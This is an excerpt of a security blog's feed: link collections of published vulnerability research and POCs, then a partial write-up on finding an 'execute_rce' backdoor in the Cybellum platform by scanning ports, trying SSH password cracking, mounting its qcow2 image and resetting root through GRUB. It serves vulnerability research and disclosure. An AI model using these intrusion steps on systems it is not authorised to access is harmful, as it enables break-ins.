href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=1C7E6B699CC32335D9E3EA2A288F968F">GB/T 38626-2020 Information security technology: Password protection guidelines for smart connected devices</a></li></ul><h2 id="站点"><a href="#站点" class="headerlink" title="站点"></a>Sites</h2><ul><li><a href="https://wiki.recessim.com/view/Main_Page">RECESSIM</a></li></ul><h2 id="书籍"><a href="#书籍" class="headerlink" title="书籍"></a>Books</h2><ul><li><a href="https://nostarch.com/open-circuits">Open Circuits: The Inner Beauty of Electronic Components</a></li><li><a 
href="https://embeddedsecurity.io/introduction">Embedded Systems Security and TrustZone</a></li><li><a href="https://nostarch.com/hardwarehacking">The Hardware Hacking Handbook</a></li></ul>]]></content>
<summary type="html"><h2 id="2024"><a href="#2024" class="headerlink" title="2024"></a>2024</h2><ul>
<li><a href="https://voidstarsec.com/blog/jtag-pifex">JTAG H</summary>
<category term="IOT" scheme="http://delikely.github.io/tags/IOT/"/>
</entry>
<entry>
<title>ICS Security: Vulnerability Collection</title>
<link href="http://delikely.github.io/2099/01/01/ICS-Vulns/"/>
<id>http://delikely.github.io/2099/01/01/ICS-Vulns/</id>
<published>2099-01-01T10:00:00.000Z</published>
<updated>2023-04-28T12:42:44.195Z</updated>
<content type="html"><![CDATA[<ul><li><a href="https://www.forescout.com/resources/l1-lateral-movement-report">Deep Lateral Movement in OT Networks: When Is a Perimeter Not a Perimeter?</a></li><li><a href="https://claroty.com/team82/research/hacking-ics-historians-the-pivot-point-from-it-to-ot">Hacking ICS Historians: The Pivot Point from IT to OT</a></li><li><a href="https://claroty.com/team82/research/team82-releases-homegrown-opc-ua-network-fuzzer-based-on-boofuzz">Team82 Releases Homegrown OPC UA Network Fuzzer Based on boofuzz</a></li><li><a href="https://redballoonsecurity.com/siemens-discovery/">Critical Architectural Vulnerabilities in Siemens SIMATIC S7-1500 Series Allow for Bypass of All Protected Boot Features</a></li><li><a href="https://claroty.com/team82/research/the-race-to-native-code-execution-in-plcs-using-rce-to-uncover-siemens-simatic-s7-1200-1500-hardcoded-cryptographic-keys">The Race to Native Code Execution in PLCs: Using RCE to Uncover Siemens SIMATIC S7-1200/1500 Hardcoded Cryptographic Keys</a></li><li><a href="https://claroty.com/team82/research/jumping-nat-to-shut-down-electric-devices">Bypassing NAT to Attack Dataprobe iBoot-PDUs</a></li><li><a href="https://claroty.com/team82/research/exploiting-vulnerabilities-in-the-ot-cloud-era">Top-Down and Bottom-Up: Exploiting Vulnerabilities In the OT Cloud Era</a></li><li><a href="https://www.armis.com/research/modipwn/">ModiPwn - can allow attackers to bypass authentication mechanisms which can lead to native remote-code-execution on vulnerable PLCs</a></li><li><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vulnerabilities-in-schneider-electric-somachine-and-m221-plc/">Vulnerabilities in Schneider Electric SoMachine and M221 PLC (CVE-2017-6034 and CVE-2020-7489)</a></li><li><a href="https://i.blackhat.com/USA-19/Thursday/us-19-Bitan-Rogue7-Rogue-Engineering-Station-Attacks-On-S7-Simatic-PLCs-wp.pdf">Rogue7: Rogue Engineering-Station attacks on S7 Simatic PLCs</a> <a 
href="https://www.venustech.com.cn/article/1/11639.html">Analysis and reproduction</a></li><li><a href="https://www.rapid7.com/research/report/investigating-can-bus-network-integrity-in-avionics-systems/">Investigating CAN Bus Network Integrity in Avionics Systems</a></li><li><a href="https://armis.com/urgent11/">URGENT/11: 11 Zero Day Vulnerabilities Impacting VxWorks</a></li><li><a href="https://go.armis.com/hubfs/White-papers/Urgent11%20Technical%20White%20Paper.pdf">URGENT/11: Technical White Paper</a></li></ul><h2 id="Router"><a href="#Router" class="headerlink" title="Router"></a>Router</h2><ul><li><a href="https://sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-wago-852-industrial-managed-switch-series-cve-2019-12550-cve-2019-12549/">Multiple vulnerabilities in WAGO industrial switches: CVE-2019-12550 and CVE-2019-12549</a></li><li><a href="https://medium.com/@bertinjoseb/four-faith-industrial-routers-command-injection-rce-reverse-shell-121c4dedb0d8">Four Faith Industrial routers Command Injection RCE Reverse Shell</a></li></ul><h2 id="SCADA"><a href="#SCADA" class="headerlink" title="SCADA"></a>SCADA</h2><ul><li><a href="https://www.tenable.com/blog/tenable-research-advisory-critical-schneider-electric-indusoft-web-studio-and-intouch-machine">Critical Schneider Electric InduSoft Web Studio and InTouch Machine Edition Vulnerability (CVE-2018-8840)</a></li><li><a href="https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password">mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password</a></li></ul><h2 id="Protocol"><a href="#Protocol" class="headerlink" title="Protocol"></a>Protocol</h2><ul><li><a href="https://claroty.com/2021/04/15/blog-research-fuzzing-and-pring/">The OpENer EtherNet/IP stack Multiple Vulnerabilities</a></li></ul><h2 id="Medical"><a href="#Medical" class="headerlink" title="Medical"></a>Medical</h2><ul><li><a href="https://www.armis.com/research/pwnedpiper/">PwnedPiper - Armis</a></li></ul>]]></content>
<summary type="html"><ul>
<li><a href="https://www.forescout.com/resources/l1-lateral-movement-report">Deep Lateral Movement in OT Networks: When Is a Perimeter </summary>
<category term="ICS" scheme="http://delikely.github.io/tags/ICS/"/>
</entry>
<entry>
<title>Protocol Security: Vulnerability Collection</title>
<link href="http://delikely.github.io/2099/01/01/protocol-Vulns/"/>
<id>http://delikely.github.io/2099/01/01/protocol-Vulns/</id>
<published>2099-01-01T09:00:00.000Z</published>
<updated>2024-05-26T16:27:10.089Z</updated>
<content type="html"><![CDATA[<h2 id="TCP-IP"><a href="#TCP-IP" class="headerlink" title="TCP/IP"></a>TCP/IP</h2><ul><li><a href="https://www.synacktiv.com/publications/exploiting-a-remote-heap-overflow-with-a-custom-tcp-stack.html">Exploiting a remote heap overflow with a custom TCP stack</a></li><li><a href="https://www.forescout.com/blog/new-critical-vulnerabilities-found-on-nucleus-tcp-ip-stack/">NUCLEUS:13 - New Critical Vulnerabilities Found on Nucleus TCP/IP Stack</a></li><li><a href="https://www.forescout.com/blog/numberjack-forescout-research-labs-finds-nine-isn-generation-vulnerabilities-affecting-tcpip-stacks/">NUMBER:JACK - Forescout Research Labs Finds Nine ISN Generation Vulnerabilities Affecting TCP/IP Stacks</a></li><li><a href="https://www.forescout.com/research-labs/infra-halt/">INFRA:HALT - 14 new vulnerabilities affecting closed source TCP/IP stack NicheStack</a></li><li><a href="https://tsuname.io/">tsuNAME: Vulnerability that can be used to DDoS DNS</a></li><li><a href="https://www.forescout.com/research-labs/namewreck/">NAME:WRECK - nine new vulnerabilities affecting four popular TCP/IP stacks</a></li><li><a href="https://www.forescout.com/research-labs/amnesia33/">AMNESIA:33 - open source TCP/IP stacks (uIP, FNET, picoTCP and Nut/Net)</a> <a href="https://www.forescout.com/company/resources/amnesia33-how-tcp-ip-stacks-breed-critical-vulnerabilities-in-iot-ot-and-it-devices/">White Paper</a></li><li><a href="https://raccoon-attack.com/">TLS Raccoon Attack</a></li><li><a href="https://www.jsof-tech.com/ripple20/">Ripple20: 19 Zero-Day Vulnerabilities Amplified by the Supply Chain</a></li><li><a href="https://callstranger.com/">CallStranger: Data Exfiltration & Reflected Amplified TCP DDOS & Port Scan via UPnP SUBSCRIBE Callback</a> <a href="https://www.venustech.com.cn/article/1/11863.html">Analysis</a></li><li><a href="https://www.armis.com/urgent11/">URGENT/11: 11 Zero Day Vulnerabilities Impacting VxWorks</a></li><li><a href="https://www.jsof-tech.com/disclosures/dnspooq/">DNSpooq: 7 vulnerabilities in Dnsmasq</a></li><li><a href="https://blog.zimperium.com/freertos-tcpip-stack-vulnerabilities-details/">FreeRTOS TCP/IP Stack Vulnerabilities</a></li></ul><h2 id="Blutooth"><a href="#Blutooth" class="headerlink" title="Blutooth"></a>Bluetooth</h2><ul><li><a href="https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth">CVE Lists: bluetooth</a></li><li><a href="https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing">CVE-2023-45866: Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing</a></li><li><a href="https://github.com/marcnewlin/hi_my_name_is_keyboard/tree/main">Keystroke Injection</a></li><li><a href="https://francozappa.github.io/post/2023/bluffs-ccs23/">BLUFFS: Bluetooth Forward and Future Secrecy Attacks and Defenses</a></li><li><a href="https://dl.acm.org/doi/10.1145/3548606.3560668">Blacktooth: Breaking through the Defense of Bluetooth in Silence</a></li><li><a href="https://www.ndss-symposium.org/ndss-paper/badbluetooth-breaking-android-security-mechanisms-via-malicious-bluetooth-peripherals/">BadBluetooth: Breaking Android Security Mechanisms via Malicious Bluetooth Peripherals</a> <a href="https://www.bilibili.com/video/BV1EV411y7Cp">Video</a></li><li><a href="https://github.com/ElevenPaths/DirtyTooth-RaspberryPi">DirtyTooth-RaspberryPi: Exploit the hack for IOS 11.1.2 and earlier to collect leaked information.</a> <a href="https://www.hacking.land/2017/08/la-implementaci-de-dirtytooth-hack-para.html?m=1">More</a> <a href="https://www.exploit-db.com/docs/english/42430-dirtytooth-extracting-vcard-data-from-bluetooth-ios-profiles.pdf">Whitepaper</a></li><li><a href="https://github.com/Charmve/BLE-Security-Attack-Defence">BLE-Security-Attack-Defence: The dangers of BLE implementations: Unveiling zero day vulnerabilities and security flaws in modern Bluetooth LE stacks.</a></li><li><a href="https://hexhive.epfl.ch/BLURtooth/">BLURtooth: BLUR attacks</a></li><li><a href="https://asset-group.github.io/disclosures/braktooth/">BRAKTOOTH: Causing Havoc on Bluetooth Link Manager</a></li><li><a href="https://francozappa.github.io/about-bias/">BIAS: Bluetooth Impersonation AttackS</a></li><li><a href="https://github.com/Matheus-Garbelini/sweyntooth_bluetooth_low_energy_attacks">SweynTooth: Unleashing Mayhem over Bluetooth Low Energy</a></li><li><a href="https://knobattack.com/">Key Negotiation of Bluetooth Attack: Breaking Bluetooth Security</a> <a href="https://francozappa.github.io/project/knob/">More</a></li><li><a href="https://www.armis.com/blueborne/">BlueBorne</a> <a href="https://github.com/ojasookert/CVE-2017-0785">POC</a></li><li><a href="https://www.armis.com/bleedingbit/">BLEEDINGBIT: THE HIDDEN ATTACK SURFACE WITHIN BLE CHIPS</a></li><li><a href="https://www.blackhat.com/us-20/briefings/schedule/#stealthily-access-your-android-phones-bypass-the-bluetooth-authentication-19993">Stealthily Access Your Android Phones: Bypass the Bluetooth Authentication</a> <a href="https://www.youtube.com/watch?v=6J3weqoiads">Video</a></li></ul><h2 id="WiFi"><a href="#WiFi" class="headerlink" title="WiFi"></a>WiFi</h2><ul><li><a href="https://www.fragattacks.com/">FragAttacks (fragmentation and aggregation attacks)</a></li><li><a href="https://packetstormsecurity.com/files/156809/Broadcom-Wi-Fi-KR00K-Proof-Of-Concept.html">Broadcom Wi-Fi KR00K Proof Of Concept</a></li><li><a href="https://www.welivesecurity.com/wp-content/uploads/2020/02/ESET_Kr00k.pdf">KR00K - CVE-2019-15126</a></li><li><a href="https://www.krackattacks.com/">Key Reinstallation Attacks</a></li><li><a 
href="https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html">Over The Air: Exploiting Broadcom’s Wi-Fi Stack</a></li></ul><h2 id="UWB"><a href="#UWB" class="headerlink" title="UWB"></a>UWB</h2><ul><li><a href="https://arxiv.org/abs/2111.05313">Ghost Peak: Practical Distance Reduction Attacks Against HRP UWB Ranging</a></li></ul><h2 id="NFC"><a href="#NFC" class="headerlink" title="NFC"></a>NFC</h2><ul><li><a href="https://github.com/Iskuri/PN553-Signature-Bypass">A tool that bypasses PN553 signature protection</a></li><li><a href="https://www.pentestpartners.com/security-blog/breaking-the-nfc-chips-in-tens-of-millions-of-smart-phones-and-a-few-pos-systems/">Breaking the NFC chips in tens of millions of smart phones, and a few PoS systems</a></li></ul><h2 id="ICS"><a href="#ICS" class="headerlink" title="ICS"></a>ICS</h2><ul><li><a href="https://claroty.com/2021/04/15/blog-research-fuzzing-and-pring/">The OpENer EtherNet/IP stack Multiple Vulnerabilities</a></li></ul><h2 id="CHIPS"><a href="#CHIPS" class="headerlink" title="CHIPS"></a>CHIPS</h2><ul><li><a href="https://www.vdoo.com/blog/realtek-rtl8195a-vulnerabilities-discovered">Major Vulnerabilities discovered and patched in Realtek RTL8195A Wi-Fi Module</a></li></ul>]]></content>
<summary type="html"><h2 id="TCP-IP"><a href="#TCP-IP" class="headerlink" title="TCP/IP"></a>TCP/IP</h2><ul>
<li><a href="https://www.synacktiv.com/publications/</summary>
</entry>
<entry>
<title>Worth a Look: Vulnerability Collection</title>
<link href="http://delikely.github.io/2099/01/01/genius-vulns/"/>
<id>http://delikely.github.io/2099/01/01/genius-vulns/</id>
<published>2099-01-01T08:00:00.000Z</published>
<updated>2023-04-07T03:47:51.434Z</updated>
<content type="html"><![CDATA[<h2 id="有趣的漏洞"><a href="#有趣的漏洞" class="headerlink" title="有趣的漏洞"></a>Interesting vulnerabilities</h2><ul><li><a href="https://www.bleepingcomputer.com/news/microsoft/windows-11-snipping-tool-privacy-bug-exposes-cropped-image-content/">Windows 11 Snipping Tool privacy bug exposes cropped image content</a></li><li><a href="https://blog.luitjes.it/posts/injectgpt-most-polite-exploit-ever/">InjectGPT: the most polite exploit ever</a></li><li><a href="https://varun.ch/history">Retrieving your browsing history through a CAPTCHA</a></li><li><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/from-stored-xss-to-rce-using-beef-and-elfinder-cve-2021-45919/">CVE-2021-45919: From Stored XSS to Code Execution using SocEng, BeEF and elFinder</a></li><li><a href="https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/">Exploiting URL Parsing Confusion Vulnerabilities</a></li><li><a href="https://portswigger.net/research/ublock-i-exfiltrate-exploiting-ad-blockers-with-css">uBlock, I exfiltrate: exploiting ad blockers with CSS</a></li><li><a href="https://trojansource.codes/">Trojan Source Attacks</a></li><li><a href="https://cyberxplore.medium.com/how-we-are-able-to-hack-any-company-by-sending-message-including-facebook-google-microsoft-b7773626e447">How We Are Able To Hack Any Company By Sending Message - US $20000 Bounty CVE-2021-34506 (uXSS in the translation feature)</a> <a href="https://www.youtube.com/watch?v=XfTN7fPtB1s">Video</a></li><li><a href="https://samcurry.net/hacking-apple/">We Hacked Apple for 3 Months: Here’s What We Found</a></li><li><a href="https://www.wizer-training.com/blog/copy-paste">How To Get Hacked By Accidentally Copy Pasting</a></li></ul><h3 id="软链接的妙用"><a href="#软链接的妙用" class="headerlink" title="软链接的妙用"></a>Clever uses of symlinks</h3><ul><li><a href="https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE/">How to get root on Ubuntu 20.04 by pretending nobody’s /home</a></li></ul><h3 id="目录穿越的妙用"><a href="#目录穿越的妙用" class="headerlink" title="目录穿越的妙用"></a>Clever uses of directory traversal</h3><ul><li><a href="https://github.com/ea/bosch_headunit_root">bosch headunit root</a></li></ul><h2 id="影响重大的漏洞"><a href="#影响重大的漏洞" class="headerlink" title="影响重大的漏洞"></a>High-impact vulnerabilities</h2><ul><li><a href="https://dirtypipe.cm4all.com/">Dirty Pipe: A vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files (CVE-2022-0847, privilege escalation)</a> <a href="https://haxx.in/files/dirtypipez.c">EXP</a></li><li><a href="https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034">PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)</a> <a href="https://haxx.in/files/blasty-vs-pkexec.c">POC</a></li><li><a href="https://logging.apache.org/log4j/2.x/security.html">CVE-2021-44228: Log4j2 remote code execution vulnerability</a> <a href="https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce">POC</a> <a href="https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/">CVE-2021-44832</a></li><li><a href="https://github.com/hhroot/2021_Hvv">2021 HVV POC collection</a></li><li><a href="https://proxylogon.com/">ProxyLogon: pre-authenticated RCE vulnerability on Microsoft Exchange Server</a></li><li><a href="https://github.com/jas502n/CVE-2020-5902">CVE-2020-5902: F5 BIG-IP remote code execution vulnerability</a></li><li><a href="https://blog.csdn.net/sun1318578251/article/details/105728541/">Tongda OA 2017 / V11.X~V11.5: pre-auth arbitrary-user login vulnerability and file upload vulnerability</a> <a href="https://github.com/NS-Sp4ce/TongDaOA-Fake-User">arbitrary-user login POC</a> <a href="https://github.com/clm123321/tongda_oa_rce">file upload POC</a></li><li><a href="https://baijiahao.baidu.com/s?id=1637627363255074344&wfr=spider&for=pc">Seeyon A8 OA arbitrary file upload getshell vulnerability analysis report</a> <a href="https://paper.seebug.org/964/">Encryption and decryption method for Seeyon OA’s variant BASE64 algorithm</a></li></ul><h2 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h2><ul><li><a href="https://www.synacktiv.com/sites/default/files/2023-03/Synacktiv-Grails-Spring-Security-CVE-2022-41923.pdf">CVE-2022-41923 Improper Privilege Management in Grails Spring Security Core <= 5.1.0</a></li><li><a href="https://bugs.xdavidhu.me/google/2022/11/10/accidental-70k-google-pixel-lock-screen-bypass/">Accidental $70k Google Pixel Lock Screen Bypass</a></li><li><a href="https://halove23.blogspot.com/2021/09/zdi-21-1053-bypassing-windows-lock.html">Bypassing Windows Lock Screen</a></li><li><a href="https://blog.zapb.de/stm32f1-exceptional-failure/">Exception(al) Failure - Breaking the STM32F1 Read-Out Protection</a></li><li><a href="https://twitter.com/samwcyo/status/1597695281881296897">A vulnerability affecting Hyundai and Genesis vehicles where we could remotely control car</a></li><li><a href="https://raelize.com/blog/espressif-systems-esp32-bypassing-flash-encryption/">CVE-2020-15048 | Espressif ESP32: Bypassing Flash Encryption</a></li><li><a href="https://raelize.com/blog/espressif-esp32-bypassing-encrypted-secure-boot-cve-2020-13629/">CVE-2020-13629 | Espressif ESP32: Bypassing Encrypted Secure Boot</a></li><li><a href="https://infosecwriteups.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37">How I Got $10,000 From GitHub For Bypassing Filtration oF HTML tags</a></li></ul><h2 id="Escape"><a href="#Escape" class="headerlink" title="Escape"></a>Escape</h2><ul><li><a href="https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/">Breaking out of Docker via runC – Explaining CVE-2019-5736</a></li><li><a href="https://www.synacktiv.com/publications/escaping-from-bhyve.html">Escaping from bhyve</a></li></ul><h2 id="Browser"><a href="#Browser" class="headerlink" title="Browser"></a>Browser</h2><ul><li><a href="https://starlabs.sg/blog/2022/12-the-hole-new-world-how-a-small-leak-will-sink-a-great-browser-cve-2021-38003/">TheHole New World - how a small leak will sink a great browser (CVE-2021-38003)</a></li><li><a href="https://jhalon.github.io/chrome-browser-exploitation-1/">Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals</a></li></ul><h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>Other</h2><ul><li><a href="https://www.trellix.com/en-us/about/newsroom/stories/research/tarfile-exploiting-the-world.html">Tarfile: Exploiting the World With a 15-Year-Old Vulnerability</a></li><li><a href="https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/">Stranger Strings: An exploitable flaw in SQLite</a></li></ul>]]></content>
<summary type="html"><h2 id="有趣的漏洞"><a href="#有趣的漏洞" class="headerlink" title="有趣的漏洞"></a>Interesting vulnerabilities</h2><ul>
<li><a href="https://www.bleepingcomputer.com/news/micro</summary>
</entry>
<entry>
<title>Take a glance of browser, I find Cybellum RCE</title>
<link href="http://delikely.github.io/2024/02/18/Cybellum-RCE/"/>
<id>http://delikely.github.io/2024/02/18/Cybellum-RCE/</id>
<published>2024-02-18T07:00:00.000Z</published>
<updated>2024-02-20T01:24:29.880Z</updated>
<content type="html"><![CDATA[<h2 id="Take-a-glance-of-browser-I-find-Cybellum-RCE"><a href="#Take-a-glance-of-browser-I-find-Cybellum-RCE" class="headerlink" title="Take a glance of browser, I find Cybellum RCE"></a>Take a glance of browser, I find Cybellum RCE</h2><p><img src="db928a6e2257e36f037d7028ca69982.png" alt=""><br>One day I visited my friend @Imweekend. He was scanning IVI firmware for vulnerabilities with Cybellum (The Product Security Platform). The platform is used to manage and validate SBOMs, detect and prioritize vulnerabilities, comply with regulations and manage incident response. It is based on a browser/server architecture. </p><h3 id="About-Vendor"><a href="#About-Vendor" class="headerlink" title="About Vendor"></a>About Vendor</h3><p><a href="https://cybellum.com/">Cybellum</a> is a company that provides product security solutions for device manufacturers in the automotive, medical and industrial sectors. It helps them manage cybersecurity and cyber compliance across the entire product lifecycle, from SBOM management to vulnerability management to incident response. LG Electronics acquired Cybellum in 2021.</p><p>The platform is widely used throughout the world by OEMs (BMW, Nissan, Great Wall etc.), Tier 1 suppliers (Denso, Mobileye, Harman etc.) and third-party inspection institutions (CATARC, CAERI, CSTC, CEPREI etc.).</p><p><img src="image-20231226013456489.png" alt="image-20231226013456489" style="zoom:50%;" /></p><h3 id="Interesting-status"><a href="#Interesting-status" class="headerlink" title="Interesting status"></a>Interesting status</h3><p>A glance at the web page caught my eye. </p><p><img src="image-20230528184442715.png" alt="image-20230528184442715"></p><p><code>192.168.1.102:29000/api/tasks?access_key=123</code> returns the task status with the exception <code>run—subprocess bash /tmp/bffed366—d3dl—4f1e-bc65—9a839b714add/start.sh</code>. It looks like an ordinary exception from a task that failed to execute, but the task type <code>execute_rce</code> is interesting. RCE is the abbreviation of “remote code execution”, a type of security vulnerability that allows attackers to run arbitrary code on a remote machine. RCE on everything is a security researcher’s dream.</p><p>As security researchers, we are sensitive and curious about the world. <code>execute_rce</code> looks like a backdoor API, so we decided to dig into it deeper. Cybellum is a commercial product; it is a black box to us, and we need more information to investigate whether it is a backdoor or not.</p><h3 id="Regcongize-service"><a href="#Regcongize-service" class="headerlink" title="Regcongize service"></a>Recognize service</h3><p>First, use nmap to find whether other ports are open.</p><p><img src="image-20240106165344944.png" alt="image-20240106165344944"></p><p>Surprisingly, for a commercial product, port 22 (SSH) is kept open. Logging in to the server requires a password; the default password used on the web service on port 443 (HTTPS) failed. Later we used hydra with some wordlists to crack the password, but still could not get the correct one. </p><p><img src="image-20240106170230648.png" alt="image-20240106170230648"></p><p>Coming back to the other ports: some of them are web applications, and without a URL path we only got errors.</p><p><img src="image-20240106172132756.png" alt="image-20240106172132756"></p><h3 id="Deployment-method"><a href="#Deployment-method" class="headerlink" title="Deployment method"></a>Deployment method</h3><p>It is hard to make progress from the outside, so we try to extract the firmware for further analysis. First we need to figure out the system deployment method.</p><p>We found the image named cybellum.qcow2. Qcow2 is a file format for disk image files used by QEMU. It is an updated version of the original qcow format and supports AES encryption.</p><p>Now we know Cybellum uses QEMU to serve the platform. 
The next step is to modify the qcow2 disk image and add a backdoor account for the SSH service. </p><h3 id="Mount-qcow2-disk-image"><a href="#Mount-qcow2-disk-image" class="headerlink" title="Mount qcow2 disk image"></a>Mount qcow2 disk image</h3><p>qemu-nbd is the QEMU Disk Network Block Device Server, which can be used to mount a qcow2 image.</p><ol><li><p>Enable NBD on the host</p><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">modprobe nbd max_part=8 </span><br></pre></td></tr></table></figure></li><li><p>Connect the QCOW2 as a network block device</p><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">qemu-nbd -c /dev/nbd1 ./cybellum.qcow2 </span><br></pre></td></tr></table></figure></li><li><p>Find the virtual machine partitions</p></li></ol><p><img src="image-20240106174138633.png" alt="image-20240106174138633"></p><p>Partition 1 is the 1M BIOS boot partition; partition 2 is /dev/nbd1p2; the biggest partition is /dev/nbd1p3.</p><ol start="4"><li><p>Mount the partition from the VM</p><p>Mounting /dev/nbd1p3 failed with <code>unknown filesystem type 'crypto_LUKS'</code>. The error tells us that /dev/nbd1p3 is a LUKS-encrypted partition.</p><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">└─<span class="comment"># mount /dev/nbd1p3 /media/file </span></span><br><span class="line">mount: /media/file: unknown filesystem <span class="built_in">type</span> <span class="string">'crypto_LUKS'</span>.</span><br><span class="line"> dmesg(1) may have more information after failed mount system call.</span><br></pre></td></tr></table></figure><p>cryptsetup can be used to open an encrypted partition, but without the passphrase we are stuck again.</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"># modprobe dm-crypt dm-mod</span><br><span class="line"># cryptsetup open /dev/nbd1p3 test</span><br><span class="line">Enter passphrase for /dev/nbd1p3: </span><br><span class="line"></span><br></pre></td></tr></table></figure></li><li><p>Find the encryption parameters</p><p>Before looking for a key, we need to know the encryption algorithm and key length. <code>cryptsetup luksDump</code> dumps the header information of a LUKS device. <code>cryptsetup luksDump /dev/nbd1p3</code> shows that the cipher is aes-xts-plain64 and the key is 512 bits.</p><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">LUKS header information</span><br><span class="line">Version: 2</span><br><span class="line">Epoch: 5</span><br><span class="line">Metadata area: 16384 [bytes]</span><br><span class="line">Keyslots area: 16744448 [bytes]</span><br><span class="line">UUID: 871011b5-f0cd-47d7-946c-a1dc6c356359</span><br><span class="line">Label: (no label)</span><br><span class="line">Subsystem: (no subsystem)</span><br><span class="line">Flags: (no flags)</span><br><span class="line"></span><br><span class="line">Data segments:</span><br><span class="line"> 0: crypt</span><br><span class="line">    offset: 16777216 [bytes]</span><br><span class="line">    length: (whole device)</span><br><span class="line">    cipher: aes-xts-plain64</span><br><span class="line">    sector: 512 [bytes]</span><br><span class="line"></span><br><span class="line">Keyslots:</span><br><span class="line"> 1: luks2</span><br><span class="line">    Key: 512 bits</span><br><span class="line">    Priority: normal</span><br><span class="line">    Cipher: aes-xts-plain64</span><br><span class="line">    Cipher key: 512 bits</span><br><span class="line">    PBKDF: argon2i</span><br><span class="line">    Time cost: 4</span><br><span class="line">    Memory: 945543</span><br><span class="line">    Threads: 4</span><br><span class="line">    Salt: 74 e4 f0 7d 4c 6f 9e dc 4a e4 6c 74 13 7c fa 90 </span><br><span class="line">     37 b4 39 2e 9a 51 71 92 da c5 c8 c7 d7 a0 d7 5e </span><br><span class="line">    AF stripes: 4000</span><br><span class="line">    AF <span class="built_in">hash</span>: sha256</span><br><span class="line">    Area offset:290816 [bytes]</span><br><span class="line">    Area length:258048 [bytes]</span><br><span class="line">    Digest ID: 0</span><br><span class="line">Tokens:</span><br><span class="line">Digests:</span><br><span class="line"> 0: pbkdf2</span><br><span class="line">    Hash: sha256</span><br><span class="line">    Iterations: 121362</span><br><span class="line">    Salt: e9 a4 5f f5 b0 04 70 68 fd 9e d0 1e 10 90 05 18 </span><br><span class="line">     e0 64 03 b4 c2 56 e5 8e 6e 2a 91 d8 c6 6e 66 ed </span><br><span class="line">    Digest: 22 62 2a 43 6c f5 1b 36 88 b2 fb 7c ae 86 39 c1 </span><br><span class="line">     b2 27 a7 ab 94 12 d3 72 9b 24 e8 fa a1 e9 f9 c2 </span><br><span class="line"> </span><br></pre></td></tr></table></figure></li></ol><p>While I was dedicated to finding the 512-bit AES key, @Imweekend found another way to get access to the system.</p><p> <em>NOTICE: decrypting and modifying the image is covered in the next blog post.</em></p><h3 id="Another-easy-way-to-get-in"><a href="#Another-easy-way-to-get-in" class="headerlink" title="Another easy way to get in"></a>Another easy way to get in</h3><ol><li><p>Convert qcow2 to vmdk</p><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">qemu-img convert -f qcow2 cybellum.qcow2 -O vmdk cybellum.vmdk</span><br></pre></td></tr></table></figure></li><li><p>Use VMware Workstation to create a new virtual machine with the existing virtual disk (cybellum.vmdk)</p><p><img src="image-20240106182339175.png" alt="image-20240106182339175" style="zoom:50%;" /></p></li><li><p>Grub and the character console are available</p><p>Open the virtual machine and hold <code>Shift</code> while Grub loads. Grub lacks protection. The next step is to reset the root password through Grub.</p><p><img src="image-20240106182533068.png" alt="image-20240106182533068"></p><p>The system prints a lot of information during a normal boot.</p><p><img src="image-20240106182807215.png" alt="image-20240106182807215"></p><p>After boot has finished, the virtual graphical console does not show a login prompt as it normally would. </p><p><img src="image-20240106183057195.png" alt="image-20240106183057195"></p><p>This indicates that the graphical console is disabled, but the virtual character consoles are still available; use <code>ALT+F1-F6</code> to switch to another console.</p><p><img src="image-20240106184303046.png" alt="image-20240106184303046"></p></li><li><p>Reset the root password</p><p>Open the virtual machine and hold <code>Shift</code> while Grub loads. Go to the submenu <code>Advanced options for Ubuntu</code>.</p><p><img src="image-20240106184950501.png" alt="image-20240106184950501" style="zoom:82%;" /></p><p>You will then be prompted by a menu that looks something like this; press Enter to continue into <code>recovery mode</code>.</p><p><img src="image-20240106185005189.png" alt="image-20240106185005189"></p><p>Using the arrow keys, scroll down to <strong>root</strong> and then hit Enter.</p><p><img src="image-20240106185117207.png" alt="image-20240106185117207"></p><p>You now see a root prompt, something like this; set the user’s password with the <code>passwd</code> command.</p><p><img src="image-20240106185545651.png" alt="image-20240106185545651"></p></li><li><p>Get access to the OS</p><p>After rebooting the system and hitting <code>ALT+2</code> to switch to the character console, we are able to log in with the new password.</p><p><img src="image-20240106185719258.png" alt="image-20240106185719258"></p></li></ol><h3 id="Analysis-backdoor"><a href="#Analysis-backdoor" class="headerlink" title="Analysis backdoor"></a>Analysis backdoor</h3><p>Following the keyword <code>execute_rce</code>, we did some digging and found a backdoor API 
